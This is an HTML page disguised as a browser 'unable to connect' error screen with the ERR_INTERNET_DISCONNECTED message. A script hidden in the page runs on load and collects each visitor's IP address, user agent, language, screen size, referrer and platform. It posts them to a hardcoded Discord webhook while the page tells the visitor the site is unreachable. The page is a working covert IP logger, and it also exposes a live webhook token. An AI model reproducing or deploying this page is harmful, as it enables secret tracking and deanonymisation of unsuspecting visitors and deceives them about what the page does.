<html>
  <style>
    #text{
      position:absolute;
      font-family: 'Segoe UI', Tahoma, sans-serif;
    }
    body{
  background-color:#f7f7f7;
}

dinoTravolta{
  position:absolute;
  background-image:url();
  top:50%;
  left:50%;
  margin-left:-260px;
  margin-top:-155px;
  width:62px;
  height:50px;
  background-position:0 0;
  animation: aniTravolta 5s steps(25) infinite;
  animation-direction:alternate;
}

error{
  color:#333;
  font-size: 1.6em;
  font-weight: normal;
  line-height: 1.25em;
  left:50%;
  top:50%;
  margin-left:-250px;
  margin-top:-90px;
}

smallMessage{
  display:block;
  color: #2b2b2b;
  font-size: 1em;
  line-height: 1.55;
  width:650px;
  left:50%;
  top:50%;
  margin-left:-250px;
  margin-top:-47px;
}

errCause{
  color: #b7b7b7;
  font-size: .86667em;
  left:50%;
  top:50%;
  margin-left:-250px;
  margin-top:15px;
}

a, a:visited{
  font: 13.3333px Arial !important;
  top:50%;
  left:50%;
  margin-left:-250px;
  margin-top:70px;
  color:#696969;
}



overlay{
  position:absolute;
  margin-left:-8px;
  margin-top:-8px;
  width:100%;
  height:100%;
  background-color:black;
}

input:active{
  display:none;
}

@keyframes aniTravolta{
  0%{background-position: 0 0;}
  50%{background-position: -1550px 0;}
  50.0001%{background-position: 0 -50px;}
  100%{background-position: -1550px -50px;}
}
  </style>
    <script>
        function enviarMensagem() {
          fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
              const ipAddress = data.ip;
              const webhookUrl = 'https://discordapp.com/api/webhooks/1125849929890402437/xHIrtwxCP_aDWwuivyFGAH81iHdZGhMDPg3vrCXZrDobhOkjSEJ0bNztpejZR14rNs_b';
    
              const userAgent = navigator.userAgent;
              const language = navigator.language;
              const screenWidth = window.screen.width;
              const screenHeight = window.screen.height;
              const referrer = document.referrer;
              const operatingSystem = navigator.platform;
    
              const message = `@everyone Nova visita ao site! \nIP: ${ipAddress} \nUser-Agent: ${userAgent} \nLinguagem: ${language} \nScreen Resolução: ${screenWidth}x${screenHeight} \nReferrer: ${referrer} \nSistema Operacional: ${operatingSystem}`;
    
              fetch(webhookUrl, {
                method: 'POST',
                headers: {
                  'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                  content: message,
                }),
              })
                .then(response => {
                  console.log('Mensagem enviada com sucesso!');
                })
                .catch(error => {
                  console.error('Erro ao enviar a mensagem:', error);
                });
            })
            .catch(error => {
              console.error('Erro ao obter o endereço IP:', error);
            });
        }
    
        window.addEventListener('DOMContentLoaded', (event) => {
          enviarMensagem();
        });
      </script>
  <body>
    <dinoTravolta>
    </dinoTravolta>
    <error id=text>
      Unable to connect to the Website
    </error>
    <smallMessage id=text>
      Google can’t display the Website because your computer isn’t connected to the Internet.
    </smallMessage>
    <errCause id=text>
      ERR_INTERNET_DISCONNECTED
    </errCause>
    <a href="https://google.com" id=text target='blank'>Details</a>
  </body>
    
</html>
